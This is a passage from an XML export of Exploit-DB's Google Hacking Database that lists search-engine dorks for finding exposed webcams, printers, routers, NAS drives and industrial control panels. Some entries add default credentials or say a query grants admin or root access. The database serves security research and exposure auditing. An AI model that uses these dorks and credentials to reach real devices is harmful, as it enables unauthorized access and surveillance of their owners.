<link>https://www.exploit-db.com/ghdb/4407</link>
<category>Various Online Devices</category>
<shortDescription>inurl:cgi-bin/lsnodes_web?node</shortDescription>
<textualDescription>Dork for status node of radios online.
Dork by Rootkit Pentester.</textualDescription>
<query>inurl:cgi-bin/lsnodes_web?node</query>
<querystring>https://www.google.com/search?q=inurl:cgi-bin/lsnodes_web?node</querystring>
<edb></edb>
<date>2017-03-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>3969</id>
<link>https://www.exploit-db.com/ghdb/3969</link>
<category>Various Online Devices</category>
<shortDescription>inurl:cgi-bin/mailgraph.cgi</shortDescription>
<textualDescription>Mail statistics
Ariel Anonis - @ariel_anonis</textualDescription>
<query>inurl:cgi-bin/mailgraph.cgi</query>
<querystring>https://www.google.com/search?q=inurl:cgi-bin/mailgraph.cgi</querystring>
<edb></edb>
<date>2014-10-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5654</id>
<link>https://www.exploit-db.com/ghdb/5654</link>
<category>Various Online Devices</category>
<shortDescription>inurl:CGI/Java/Serviceability?adapter=device.statistics.device</shortDescription>
<textualDescription># Google Dork: inurl:CGI/Java/Serviceability?adapter=device.statistics.device
# Description: Google Dork to find Cisco Unified IP Phones
# Date: 2019-11-21
# Author: Miguel Santareno
# Contact: https://www.linkedin.com/in/miguelsantareno/
</textualDescription>
<query>inurl:CGI/Java/Serviceability?adapter=device.statistics.device</query>
<querystring>https://www.google.com/search?q=inurl:CGI/Java/Serviceability?adapter=device.statistics.device</querystring>
<edb></edb>
<date>2019-11-21</date>
<author>Miguel Santareno</author>
</entry>
<entry>
<id>5839</id>
<link>https://www.exploit-db.com/ghdb/5839</link>
<category>Various Online Devices</category>
<shortDescription>inurl:cgistart</shortDescription>
<textualDescription>Category: Various Online Devices
Nicholas Doropoulos</textualDescription>
<query>inurl:cgistart</query>
<querystring>https://www.google.com/search?q=inurl:cgistart</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>4689</id>
<link>https://www.exploit-db.com/ghdb/4689</link>
<category>Various Online Devices</category>
<shortDescription>inurl:cloud_main.asp</shortDescription>
<textualDescription># Google Dork: [inurl:cloud_main.asp]
# Date: [02/03/2018]
# Exploit Author: [MikiDiCalenella]
Description: web ui for Asus Aicloud
</textualDescription>
<query>inurl:cloud_main.asp</query>
<querystring>https://www.google.com/search?q=inurl:cloud_main.asp</querystring>
<edb></edb>
<date>2018-03-07</date>
<author>MikiDiCalenella</author>
</entry>
<entry>
<id>4694</id>
<link>https://www.exploit-db.com/ghdb/4694</link>
<category>Various Online Devices</category>
<shortDescription>inurl:control/camerainfo</shortDescription>
<textualDescription>Dashboard with info of a lot of webcams!!!
Dork by Rootkit Pentester.
</textualDescription>
<query>inurl:control/camerainfo</query>
<querystring>https://www.google.com/search?q=inurl:control/camerainfo</querystring>
<edb></edb>
<date>2018-03-12</date>
<author>Rootkit_Pentester</author>
</entry>
<entry>
<id>3951</id>
<link>https://www.exploit-db.com/ghdb/3951</link>
<category>Various Online Devices</category>
<shortDescription>inurl:dfshealth.jsp</shortDescription>
<textualDescription>dork:inurl:dfshealth.jsp
direct get the access of hadoop cluster with root user
--
Simmant Yadav</textualDescription>
<query>inurl:dfshealth.jsp</query>
<querystring>https://www.google.com/search?q=inurl:dfshealth.jsp</querystring>
<edb></edb>
<date>2014-05-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>6771</id>
<link>https://www.exploit-db.com/ghdb/6771</link>
<category>Various Online Devices</category>
<shortDescription>inurl:dtm.html intitle:1747-L551</shortDescription>
<textualDescription># Google Dork: inurl:dtm.html intitle:1747-L551
# Various online devices.
# Date: 27/1/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:dtm.html intitle:1747-L551</query>
<querystring>https://www.google.com/search?q=inurl:dtm.html intitle:1747-L551</querystring>
<edb></edb>
<date>2021-02-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3982</id>
<link>https://www.exploit-db.com/ghdb/3982</link>
<category>Various Online Devices</category>
<shortDescription>inurl:dyn_sensors.htm</shortDescription>
<textualDescription>MiniGoose II environmental temprature monitoring panel
Author:@cns0x
</textualDescription>
<query>inurl:dyn_sensors.htm</query>
<querystring>https://www.google.com/search?q=inurl:dyn_sensors.htm</querystring>
<edb></edb>
<date>2015-01-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>4654</id>
<link>https://www.exploit-db.com/ghdb/4654</link>
<category>Various Online Devices</category>
<shortDescription>inurl:embed.html inurl:dvr</shortDescription>
<textualDescription>Dork who show live cams and tv.
Dork by Rootkit Pentester.
</textualDescription>
<query>inurl:embed.html inurl:dvr</query>
<querystring>https://www.google.com/search?q=inurl:embed.html inurl:dvr</querystring>
<edb></edb>
<date>2018-01-09</date>
<author>Rootkit_Pentester</author>
</entry>
<entry>
<id>4003</id>
<link>https://www.exploit-db.com/ghdb/4003</link>
<category>Various Online Devices</category>
<shortDescription>inurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:Drive</shortDescription>
<textualDescription>## Open Seagate NAS drives
inurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:Drive
Jason Coleman - CISSP, GWAPT
Analyst, Security Management Program | Verizon Enterprise Solutions</textualDescription>
<query>inurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:Drive</query>
<querystring>https://www.google.com/search?q=inurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:Drive</querystring>
<edb></edb>
<date>2015-04-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>5358</id>
<link>https://www.exploit-db.com/ghdb/5358</link>
<category>Various Online Devices</category>
<shortDescription>inurl:ftp://ftp</shortDescription>
<textualDescription>Detecting ftp sites:
inurl:ftp://ftp
Reza Abasi(Turku)
</textualDescription>
<query>inurl:ftp://ftp</query>
<querystring>https://www.google.com/search?q=inurl:ftp://ftp</querystring>
<edb></edb>
<date>2019-08-15</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5359</id>
<link>https://www.exploit-db.com/ghdb/5359</link>
<category>Various Online Devices</category>
<shortDescription>inurl:ftp://ftp robots.txt</shortDescription>
<textualDescription>finding robots.txt in ftp sites:
inurl:ftp://ftp robots.txt
Reza Abasi(Turku)
</textualDescription>
<query>inurl:ftp://ftp robots.txt</query>
<querystring>https://www.google.com/search?q=inurl:ftp://ftp robots.txt</querystring>
<edb></edb>
<date>2019-08-15</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4598</id>
<link>https://www.exploit-db.com/ghdb/4598</link>
<category>Various Online Devices</category>
<shortDescription>inurl:guestimage.html</shortDescription>
<textualDescription>Mobotix cameras online.
By Rootkit Pentester.
</textualDescription>
<query>inurl:guestimage.html</query>
<querystring>https://www.google.com/search?q=inurl:guestimage.html</querystring>
<edb></edb>
<date>2017-10-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>4993</id>
<link>https://www.exploit-db.com/ghdb/4993</link>
<category>Various Online Devices</category>
<shortDescription>inurl:home.tcl intitle:gaia</shortDescription>
<textualDescription>Check Point Firewalls &amp; Clusters
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:home.tcl intitle:gaia</query>
<querystring>https://www.google.com/search?q=inurl:home.tcl intitle:gaia</querystring>
<edb></edb>
<date>2018-10-19</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5837</id>
<link>https://www.exploit-db.com/ghdb/5837</link>
<category>Various Online Devices</category>
<shortDescription>inurl:hp/device/deviceinformation</shortDescription>
<textualDescription>Category: Various Online Devices
inurl:hp/device/deviceinformation
inurl:hp/device/firmwareupgrade
Nicholas Doropoulos
</textualDescription>
<query>inurl:hp/device/deviceinformation</query>
<querystring>https://www.google.com/search?q=inurl:hp/device/deviceinformation</querystring>
<edb></edb>
<date>2020-03-27</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>525</id>
<link>https://www.exploit-db.com/ghdb/525</link>
<category>Various Online Devices</category>
<shortDescription>inurl:hp/device/this.LCDispatcher</shortDescription>
<textualDescription>This one gets you on the web interface of some more HP Printers.</textualDescription>
<query>inurl:hp/device/this.LCDispatcher</query>
<querystring>https://www.google.com/search?hl=de&amp;q=inurl%3Ahp%2Fdevice%2Fthis.LCDispatcher+&amp;btnG=Suche&amp;btnG=Google-Suche</querystring>
<edb></edb>
<date>2004-10-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>7145</id>
<link>https://www.exploit-db.com/ghdb/7145</link>
<category>Various Online Devices</category>
<shortDescription>inurl:hp/device/webAccess</shortDescription>
<textualDescription># Google Dork: inurl:hp/device/webAccess
# Various Online Devices
# Date: 8/30/2021
# Exploit Author: Javier Bernardo
</textualDescription>
<query>inurl:hp/device/webAccess</query>
<querystring>https://www.google.com/search?q=inurl:hp/device/webAccess</querystring>
<edb></edb>
<date>2021-09-02</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>4147</id>
<link>https://www.exploit-db.com/ghdb/4147</link>
<category>Various Online Devices</category>
<shortDescription>inurl:httpmon.php</shortDescription>
<textualDescription>Dork for Zabbix Network Monitoring systems.
Dork Discovered by Rootkit Pentester.</textualDescription>
<query>inurl:httpmon.php</query>
<querystring>https://www.google.com/search?q=inurl:httpmon.php</querystring>
<edb></edb>
<date>2015-12-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>6268</id>
<link>https://www.exploit-db.com/ghdb/6268</link>
<category>Various Online Devices</category>
<shortDescription>inurl:index.shtml</shortDescription>
<textualDescription>Dork: inurl:index.shtml
Description: This google dork lists out the various camera LIVE AXIS MODEL
around the world.
Author: Abhinav Porwal
</textualDescription>
<query>inurl:index.shtml</query>
<querystring>https://www.google.com/search?q=inurl:index.shtml</querystring>
<edb></edb>
<date>2020-06-10</date>
<author>Abhinav Porwal</author>
</entry>
<entry>
<id>6900</id>
<link>https://www.exploit-db.com/ghdb/6900</link>
<category>Various Online Devices</category>
<shortDescription>inurl:ip_password.htm</shortDescription>
<textualDescription># Dork: inurl:ip_password.htm
</textualDescription>
<query>inurl:ip_password.htm</query>
<querystring>https://www.google.com/search?q=inurl:ip_password.htm</querystring>
<edb></edb>
<date>2021-04-30</date>
<author>Prakash</author>
</entry>
<entry>
<id>6896</id>
<link>https://www.exploit-db.com/ghdb/6896</link>
<category>Various Online Devices</category>
<shortDescription>inurl:ip_snmp.htm</shortDescription>
<textualDescription># Dork: inurl:ip_snmp.htm
By using this dork, ip snmp configuration page can be found.
Thank you!
Prakash
</textualDescription>
<query>inurl:ip_snmp.htm</query>
<querystring>https://www.google.com/search?q=inurl:ip_snmp.htm</querystring>
<edb></edb>
<date>2021-04-28</date>
<author>Prakash</author>
</entry>
<entry>
<id>4829</id>
<link>https://www.exploit-db.com/ghdb/4829</link>
<category>Various Online Devices</category>
<shortDescription>inurl:jpegpull.htm</shortDescription>
<textualDescription>Dork show Webcams CCTV.
Enjoy healthy.
Dork by Rootkit Pentester.
</textualDescription>
<query>inurl:jpegpull.htm</query>
<querystring>https://www.google.com/search?q=inurl:jpegpull.htm</querystring>
<edb></edb>
<date>2018-05-18</date>
<author>Rootkit_Pentester</author>
</entry>
<entry>
<id>931</id>
<link>https://www.exploit-db.com/ghdb/931</link>
<category>Various Online Devices</category>
<shortDescription>inurl:JPGLogin.htm</shortDescription>
<textualDescription>webserver detection for GeoHttpServer, the page is the login page or guest cam. Don't ask why these are mostly doggy cams, weirdness.</textualDescription>
<query>inurl:JPGLogin.htm</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=inurl%3AJPGLogin.htm</querystring>
<edb></edb>
<date>2005-04-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>4254</id>
<link>https://www.exploit-db.com/ghdb/4254</link>
<category>Various Online Devices</category>
<shortDescription>inurl:lg intitle:&quot;Looking Glass&quot;</shortDescription>
<textualDescription>Panels with lot of information of bgp and ping, tracert services and more
xD.
Best Regards.
Rootkit Pentester.</textualDescription>
<query>inurl:lg intitle:&quot;Looking Glass&quot;</query>
<querystring>https://www.google.com/search?q=inurl:lg intitle:&quot;Looking Glass&quot;</querystring>
<edb></edb>
<date>2016-04-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>4205</id>
<link>https://www.exploit-db.com/ghdb/4205</link>
<category>Various Online Devices</category>
<shortDescription>inurl:login inurl:user inurl:pass -intext:pass -intext:user</shortDescription>
<textualDescription>With this Dork you can Bypass the security of a lot of Cpanel Portal.
Have Fun.
Dork discovered by Rootkit Pentester.</textualDescription>
<query>inurl:login inurl:user inurl:pass -intext:pass -intext:user</query>
<querystring>https://www.google.com/search?q=inurl:login inurl:user inurl:pass -intext:pass -intext:user</querystring>
<edb></edb>
<date>2016-02-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>4548</id>
<link>https://www.exploit-db.com/ghdb/4548</link>
<category>Various Online Devices</category>
<shortDescription>inurl:login.cgi intitle:NETGEAR</shortDescription>
<textualDescription>inurl:login.cgi intitle:NETGEAR
To find GSS108E ProSAFE PoE+ Click Switches online.
Often the default password is &quot;password&quot; :)
http://www.fr.netgear.ch/images/datasheet/switches/ClickSwitches/GSS108E_GSS108EPP_GSS116E_DS.pdf
- cyberdefense</textualDescription>
<query>inurl:login.cgi intitle:NETGEAR</query>
<querystring>https://www.google.com/search?q=inurl:login.cgi intitle:NETGEAR</querystring>
<edb></edb>
<date>2017-07-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>6777</id>
<link>https://www.exploit-db.com/ghdb/6777</link>
<category>Various Online Devices</category>
<shortDescription>inurl:login.html intitle:&quot;Archer C7&quot;</shortDescription>
<textualDescription>Dork: inurl:login.html intitle:&quot;Archer C7&quot;</textualDescription>
<query>inurl:login.html intitle:&quot;Archer C7&quot;</query>
<querystring>https://www.google.com/search?q=inurl:login.html intitle:&quot;Archer C7&quot;</querystring>
<edb></edb>
<date>2021-02-05</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6786</id>
<link>https://www.exploit-db.com/ghdb/6786</link>
<category>Various Online Devices</category>
<shortDescription>inurl:login.html intitle:&quot;GPON Home Gateway&quot;</shortDescription>
<textualDescription>Dork: inurl:login.html intitle:&quot;GPON Home Gateway&quot;</textualDescription>
<query>inurl:login.html intitle:&quot;GPON Home Gateway&quot;</query>
<querystring>https://www.google.com/search?q=inurl:login.html intitle:&quot;GPON Home Gateway&quot;</querystring>
<edb></edb>
<date>2021-02-11</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>5934</id>
<link>https://www.exploit-db.com/ghdb/5934</link>
<category>Various Online Devices</category>
<shortDescription>inurl:mainFrame.cgi intext:&quot;RICOH&quot;</shortDescription>
<textualDescription>Category: Various Online Devices
Nicholas Doropoulos</textualDescription>
<query>inurl:mainFrame.cgi intext:&quot;RICOH&quot;</query>
<querystring>https://www.google.com/search?q=inurl:mainFrame.cgi intext:&quot;RICOH&quot;</querystring>
<edb></edb>
<date>2020-04-21</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>6957</id>
<link>https://www.exploit-db.com/ghdb/6957</link>
<category>Various Online Devices</category>
<shortDescription>inurl:mobile.html intitle:webcamXP</shortDescription>
<textualDescription># Exploit Title: Various Online Devices
# Google Dork: inurl:mobile.html intitle:webcamXP
# Date: 2021-05-21
# Exploit Author: Anmol K Sachan</textualDescription>
<query>inurl:mobile.html intitle:webcamXP</query>
<querystring>https://www.google.com/search?q=inurl:mobile.html intitle:webcamXP</querystring>
<edb></edb>
<date>2021-05-25</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>6856</id>
<link>https://www.exploit-db.com/ghdb/6856</link>
<category>Various Online Devices</category>
<shortDescription>inurl:m_login.htm &quot;Somfy&quot;</shortDescription>
<textualDescription># Google Dork: inurl:m_login.htm &quot;Somfy&quot;
# Various online devices (Smart Home Devices).
# Date: 02/04/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:m_login.htm &quot;Somfy&quot;</query>
<querystring>https://www.google.com/search?q=inurl:m_login.htm &quot;Somfy&quot;</querystring>
<edb></edb>
<date>2021-04-05</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>853</id>
<link>https://www.exploit-db.com/ghdb/853</link>
<category>Various Online Devices</category>
<shortDescription>inurl:na_admin</shortDescription>
<textualDescription>This searches for the admin pages for a &quot;Network Appliance&quot; box. An authenticated user could get access to a their data - all of it, in fact up to 100's Tb of it. This is also part of cgi scanning tools like: http://www.cirt.net/nikto/UPDATES/1.34/scan_database.db</textualDescription>
<query>inurl:na_admin</query>
<querystring>https://www.google.com/search?q=inurl%3Ana_admin</querystring>
<edb></edb>
<date>2005-02-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>4141</id>
<link>https://www.exploit-db.com/ghdb/4141</link>
<category>Various Online Devices</category>
<shortDescription>inurl:net/net/airprint.html</shortDescription>
<textualDescription>Title: inurl:net/net/airprint.html
Description : This dork can access many printers without login.
By Sivabalan</textualDescription>
<query>inurl:net/net/airprint.html</query>
<querystring>https://www.google.com/search?q=inurl:net/net/airprint.html</querystring>
<edb></edb>
<date>2015-11-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>562</id>
<link>https://www.exploit-db.com/ghdb/562</link>
<category>Various Online Devices</category>
<shortDescription>inurl:netw_tcp.shtml</shortDescription>
<textualDescription>An Axis Network Camera captures and transmits live images directly over an IP network (e.g. LAN/intranet/Internet), enabling users to remotely view and/or manage the camera from a Web browser on any computer [..]</textualDescription>
<query>inurl:netw_tcp.shtml</query>
<querystring>https://www.google.com/search?q=inurl%3Anetw_tcp.shtml&amp;btnG=B%C3%BAsqueda</querystring>
<edb></edb>
<date>2004-10-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>6869</id>
<link>https://www.exploit-db.com/ghdb/6869</link>
<category>Various Online Devices</category>
<shortDescription>inurl:pas_set_menu.html</shortDescription>
<textualDescription># Google Dork: inurl:pas_set_menu.html
# Various online devices (Canon printers).
# Date: 13/04/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:pas_set_menu.html</query>
<querystring>https://www.google.com/search?q=inurl:pas_set_menu.html</querystring>
<edb></edb>
<date>2021-04-13</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4999</id>
<link>https://www.exploit-db.com/ghdb/4999</link>
<category>Various Online Devices</category>
<shortDescription>inurl:phpPgAdmin intext:&quot;Cappuccino&quot; | intext:&quot;Blue/Green&quot;</shortDescription>
<textualDescription>This dork will identifies websites that have phpPgAdmin ,a web-based
administration tool for PostgreSQL
Sandeep S S
</textualDescription>
<query>inurl:phpPgAdmin intext:&quot;Cappuccino&quot; | intext:&quot;Blue/Green&quot;</query>
<querystring>https://www.google.com/search?q=inurl:phpPgAdmin intext:&quot;Cappuccino&quot; | intext:&quot;Blue/Green&quot;</querystring>
<edb></edb>
<date>2018-10-26</date>
<author>sandeep</author>
</entry>
<entry>
<id>4188</id>
<link>https://www.exploit-db.com/ghdb/4188</link>
<category>Various Online Devices</category>
<shortDescription>inurl:phpPgAdmin/browser.php intitle:&quot;phpPgAdmin&quot;</shortDescription>
<textualDescription>Dork For phpPgAdmin servers portal.
Discovered for Rootkit Pentester.
Regards.</textualDescription>
<query>inurl:phpPgAdmin/browser.php intitle:&quot;phpPgAdmin&quot;</query>
<querystring>https://www.google.com/search?q=inurl:phpPgAdmin/browser.php intitle:&quot;phpPgAdmin&quot;</querystring>
<edb></edb>
<date>2016-01-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>6851</id>
<link>https://www.exploit-db.com/ghdb/6851</link>
<category>Various Online Devices</category>
<shortDescription>inurl:plc/webvisu.htm intitle:&quot;CoDeSys WebVisualization&quot;</shortDescription>
<textualDescription># Google Dork: inurl:plc/webvisu.htm intitle:&quot;CoDeSys WebVisualization&quot;
# Various online devices (PLC/SCADA web visual interface)
# Date: 25/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:plc/webvisu.htm intitle:&quot;CoDeSys WebVisualization&quot;</query>
<querystring>https://www.google.com/search?q=inurl:plc/webvisu.htm intitle:&quot;CoDeSys WebVisualization&quot;</querystring>
<edb></edb>
<date>2021-03-29</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4084</id>
<link>https://www.exploit-db.com/ghdb/4084</link>
<category>Various Online Devices</category>
<shortDescription>inurl:printer/main.html</shortDescription>
<textualDescription>This Dork reveals a lot of Printers Panels.
Enjoy with moderation xD.
This Dork is discovered by Rootkit Pentester.</textualDescription>
<query>inurl:printer/main.html</query>
<querystring>https://www.google.com/search?q=inurl:printer/main.html</querystring>
<edb></edb>
<date>2015-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>1217</id>
<link>https://www.exploit-db.com/ghdb/1217</link>
<category>Various Online Devices</category>
<shortDescription>inurl:Printers/ipp_0001.asp</shortDescription>
<textualDescription>Thanks to Windows 2003 Remote Printing</textualDescription>
<query>inurl:Printers/ipp_0001.asp</query>
<querystring>https://www.google.com/search?q=inurl%3APrinters%2Fipp_0001.asp</querystring>
<edb></edb>
<date>2005-12-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4682</id>
<link>https://www.exploit-db.com/ghdb/4682</link>
<category>Various Online Devices</category>
<shortDescription>inurl:public &quot;Powered by SecureW2&quot;</shortDescription>
<textualDescription>Software for wifi access points.
Dork by Rootkit Pentester
</textualDescription>
<query>inurl:public &quot;Powered by SecureW2&quot;</query>
<querystring>https://www.google.com/search?q=inurl:public &quot;Powered by SecureW2&quot;</querystring>
<edb></edb>
<date>2018-02-26</date>
<author>Rootkit_Pentester</author>
</entry>
<entry>
<id>5045</id>
<link>https://www.exploit-db.com/ghdb/5045</link>
<category>Various Online Devices</category>
<shortDescription>inurl:public.php inurl:service ext:php</shortDescription>
<textualDescription>Files and Folders in the cloud.
Dork by Rootkit Pentester.
</textualDescription>
<query>inurl:public.php inurl:service ext:php</query>
<querystring>https://www.google.com/search?q=inurl:public.php inurl:service ext:php</querystring>
<edb></edb>
<date>2018-12-04</date>
<author>Rootkit_Pentester</author>
</entry>
<entry>
<id>4774</id>
<link>https://www.exploit-db.com/ghdb/4774</link>
<category>Various Online Devices</category>
<shortDescription>inurl:report.cgi?dashboard=</shortDescription>
<textualDescription>Dork who show MaDDash panels of traffic the net.
Dork by Rootkit Pentester
</textualDescription>
<query>inurl:report.cgi?dashboard=</query>
<querystring>https://www.google.com/search?q=inurl:report.cgi?dashboard=</querystring>
<edb></edb>
<date>2018-04-16</date>
<author>Rootkit_Pentester</author>
</entry>
<entry>
<id>3771</id>
<link>https://www.exploit-db.com/ghdb/3771</link>
<category>Various Online Devices</category>
<shortDescription>inurl:RgFirewallRL.asp | inurl:RgDmzHost.asp | inurl:RgMacFiltering.asp | inurl:RgConnect.asp | inurl:RgEventLog.asp | inurl:RgSecurity.asp | inurl:RgContentFilter.asp | inurl:wlanRadio.asp</shortDescription>
<textualDescription>Gateway Routers
Author: GhOsT-PR</textualDescription>
<query>inurl:RgFirewallRL.asp | inurl:RgDmzHost.asp | inurl:RgMacFiltering.asp | inurl:RgConnect.asp | inurl:RgEventLog.asp | inurl:RgSecurity.asp | inurl:RgContentFilter.asp | inurl:wlanRadio.asp</query>
<querystring>https://www.google.com/search?q=inurl:RgFirewallRL.asp | inurl:RgDmzHost.asp | inurl:RgMacFiltering.asp | inurl:RgConnect.asp | inurl:RgEventLog.asp | inurl:RgSecurity.asp | inurl:RgContentFilter.asp | inurl:wlanRadio.asp</querystring>
<edb></edb>
<date>2011-12-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4566</id>
<link>https://www.exploit-db.com/ghdb/4566</link>
<category>Various Online Devices</category>
<shortDescription>inurl:scgi-bin intitle:&quot;NETGEAR ProSafe&quot;</shortDescription>
<textualDescription>NETGEAR ProSafe Dual WAN Gigabit Firewall. Default username: admin. Default password: password
inurl:scgi-bin intitle:&quot;NETGEAR ProSafe&quot;
--
@verovan</textualDescription>
<query>inurl:scgi-bin intitle:&quot;NETGEAR ProSafe&quot;</query>
<querystring>https://www.google.com/search?q=inurl:scgi-bin intitle:&quot;NETGEAR ProSafe&quot;</querystring>
<edb></edb>
<date>2017-07-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>1263</id>
<link>https://www.exploit-db.com/ghdb/1263</link>
<category>Various Online Devices</category>
<shortDescription>inurl:setdo.cgi intext:&quot;Set DO OK&quot;</shortDescription>
<textualDescription>Dcs-2100 camerasBy removing &quot;intext:Set DO OK&quot; you will get more hits but they will require a login. Set DO OK is almost always admin access, you will need to go to the root of the URL to use the camera.</textualDescription>
<query>inurl:setdo.cgi intext:&quot;Set DO OK&quot;</query>
<querystring>https://www.google.com/search?q=inurl:setdo.cgi+intext:%22Set+DO+OK%22&amp;hs=hLE&amp;rls=org.mozilla:en-US:official&amp;filter=0</querystring>
<edb></edb>
<date>2006-02-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>3787</id>
<link>https://www.exploit-db.com/ghdb/3787</link>
<category>Various Online Devices</category>
<shortDescription>inurl:Settings.aspx intitle:Beyond TV</shortDescription>
<textualDescription>Beyond TV gives you the capability to turn your PC into a high quality,
digital video recorder (DVR). Most people use it for cable TV so that
they don't have to spend rent money on a low end quality hardware DVR
from their cable company. It's default config has no password or
username enabled. Very bad for people who connect their PCs directly to
their modems. I have Beyond TV and I was curious on how secure it is.</textualDescription>
<query>inurl:Settings.aspx intitle:Beyond TV</query>
<querystring>https://www.google.com/search?q=inurl:Settings.aspx intitle:Beyond TV</querystring>
<edb></edb>
<date>2012-05-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6845</id>
<link>https://www.exploit-db.com/ghdb/6845</link>
<category>Various Online Devices</category>
<shortDescription>inurl:set_config_networkIP.html</shortDescription>
<textualDescription># Google Dork: inurl:set_config_networkIP.html
# Various online devices.
# Date: 17/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:set_config_networkIP.html</query>
<querystring>https://www.google.com/search?q=inurl:set_config_networkIP.html</querystring>
<edb></edb>
<date>2021-03-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6620</id>
<link>https://www.exploit-db.com/ghdb/6620</link>
<category>Various Online Devices</category>
<shortDescription>inurl:set_config_password.html</shortDescription>
<textualDescription># inurl:set_config_password.html
# HP Printer login portals, where authentication is not set. Attackers can
visit the links from the dork output to set Administrator Password.
# Date: 17/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:set_config_password.html</query>
<querystring>https://www.google.com/search?q=inurl:set_config_password.html</querystring>
<edb></edb>
<date>2020-10-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6835</id>
<link>https://www.exploit-db.com/ghdb/6835</link>
<category>Various Online Devices</category>
<shortDescription>inurl:set_config_security.htm</shortDescription>
<textualDescription># Google Dork: inurl:set_config_security.htm
# Various online devices.
# Date: 17/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:set_config_security.htm</query>
<querystring>https://www.google.com/search?q=inurl:set_config_security.htm</querystring>
<edb></edb>
<date>2021-03-18</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4576</id>
<link>https://www.exploit-db.com/ghdb/4576</link>
<category>Various Online Devices</category>
<shortDescription>inurl:share.cgi?ssid=</shortDescription>
<textualDescription>This dork show myQnap cloud servers files and folder shared.
Have Fun!!!.
Rootkit Pentester.</textualDescription>
<query>inurl:share.cgi?ssid=</query>
<querystring>https://www.google.com/search?q=inurl:share.cgi?ssid=</querystring>
<edb></edb>
<date>2017-08-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5894</id>
<link>https://www.exploit-db.com/ghdb/5894</link>
<category>Various Online Devices</category>
<shortDescription>inurl:SSI/index.htm</shortDescription>
<textualDescription>inurl:SSI/index.htm
Category: Sensitive Information
Summary:
A Google dork that gives information about HP LaserJet Professional Printer.
</textualDescription>
<query>inurl:SSI/index.htm</query>
<querystring>https://www.google.com/search?q=inurl:SSI/index.htm</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Prasad Lingamaiah</author>
</entry>
<entry>
<id>981</id>
<link>https://www.exploit-db.com/ghdb/981</link>
<category>Various Online Devices</category>
<shortDescription>inurl:start.htm?scrw=</shortDescription>
<textualDescription>VPON (Video Picture On Net) is a video surveillance setup which seems to be used by a lot of businesses. In the FAQ posted on their site (http://www.aegismicro.com/navigation/indexsuppfaq.htm) they show a default username/password of webmonitor/oyo.=)</textualDescription>
<query>inurl:start.htm?scrw=</query>
<querystring>https://www.google.com/search?q=inurl%3Astart%2Ehtm%3Fscrw%3D</querystring>
<edb></edb>
<date>2005-05-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>5919</id>
<link>https://www.exploit-db.com/ghdb/5919</link>
<category>Various Online Devices</category>
<shortDescription>inurl:sws/index.html AND intext:&quot;Model Name&quot; AND intext:&quot;Serial Number&quot;</shortDescription>
<textualDescription>Category: Various Online Devices
Nicholas Doropoulos</textualDescription>
<query>inurl:sws/index.html AND intext:&quot;Model Name&quot; AND intext:&quot;Serial Number&quot;</query>
<querystring>https://www.google.com/search?q=inurl:sws/index.html AND intext:&quot;Model Name&quot; AND intext:&quot;Serial Number&quot;</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>580</id>
<link>https://www.exploit-db.com/ghdb/580</link>
<category>Various Online Devices</category>
<shortDescription>inurl:TiVoConnect?Command=QueryServer</shortDescription>
